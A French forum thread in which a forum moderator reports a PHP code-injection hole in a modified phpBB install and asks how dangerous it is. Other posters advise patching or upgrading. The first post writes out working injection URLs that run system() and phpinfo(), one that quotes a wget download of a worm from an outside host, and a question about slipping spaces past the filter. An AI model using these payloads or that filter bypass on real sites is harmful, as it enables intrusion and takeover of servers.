Discussion :

[LeLapinVengeur]

Bonjour,


Pour vous placer rapidement le contexte, je suis passé modérateur sur un forum qui parle modélisme.

Développeur C# de métier, je me suis un peu intéressé au forum en question qui n'est plus maintenu depuis un moment.

Le problème est que j'ai trouvé une faille d'injection de code php.
En injectant le code php comme ceci je vois le listing des fichiers dans le répertoire courant:
http://blabbla.fr?ref=dsqds567dsq'{${system(ls)}}
comme ceci je vois tous les infos php
http://blabbla.fr?ref=dsqds567dsq'{${phpinfo(INFO_ALL)}}

Jusque là ce n'est pas trop grave je pense puisque je n'arrive pas à placer des espaces.
http://blabbla.fr?ref=dsqds567dsq'{${system(ls /etc/)}}
http://blabbla.fr?ref=dsqds567dsq'{${system(ls%20/etc/)}}
ne fonctionnent pas.

C'est là ou je demande votre aide, est-ce grave en l'état? Quelles commandes pourrait être dangereuse?
j'ai vu sur le net que beaucoup font des
http://blabbla.fr?ref=dsqds567dsq'{${system(wget%20http://monworm)}}
Il y a-t-il un moyen que je connais pas pour que l'espace soit correctement reconnu ?


J'y connais rien en PHP, je vous demande votre avis, ca m'éviterai de me plonger dans ce code pour corriger ca.


Merci d'avance!

[sabotage]

Plutot qu'un problème d'espace, j'espere que c'est un problème de droits.
Enfin pouvoir lister des fichiers c'est déjà assez catastrophique je trouve. Quel forum moisi permet ça ?

[LeLapinVengeur]

Tu comprendras que je ne préfère pas divulguer l'adresse du forum avant d'avoir corriger le problème.

Le forum c'est un phpBB traficoté sinon.

[sabotage]

Je parlais du moteur de forum, pas du site
soit c'est une très vieille version de PHPbb soit il a été mochement trafiqué effectivement.

[Tsilefy]

Je m'étonne quand même qu'une version même ancienne de phpBB permette ce genre d'injection.

Regarde s'il y a des correctifs pour cette version de phpBB. S'il n'y en a pas, ou si le forum est trop modifié pour que tu puisses les appliquer (*), tu es mal. Dans ce cas, si tu es dans un serveur dédié ou un VPS il y a peut-être des palliatifs (qui ne corrigeront pas la totalité du problème). Mais si en plus tu es sur un mutualisé sans possibilité de modifier la configuration de PHP ou d'installer un module apache, je ne vois pas de solution.

Ou alors installe une version plus récente de phpBB...


(*) À tous les débutants (et non-débutants): NE JAMAIS MODIFIER LE CORE D'UNE APPLICATION! Passez toujours par un plugin, module, extension, bibliothèque, etc...

Et si ça se trouve ton site est déjà compromis depuis des années :-(

[LeLapinVengeur]

On a un serveur dédié.

Concernant la faille elle se trouve sur un bout de code php permettant de lire une video youtube. Aucune idée si il s'agit d'un bidouillage, d'un plugin, ou d'une fonction native phpBB.

N'y connaissant rien et ne connaissant pas l'impacte du bidouillage, je vais dans un premier temps récupéré tous ca sur un autre poste, et tester la MAJ phpBB.


Sinon, j'ai testé a peu près toutes les commandes que j'ai pu trouver ici : http://doc.ubuntu-fr.org/tutoriel/co...mandes_de_base
Si pas possibilité d'insérer des espaces, la marche de manoeuvre est quand meme limité je trouve.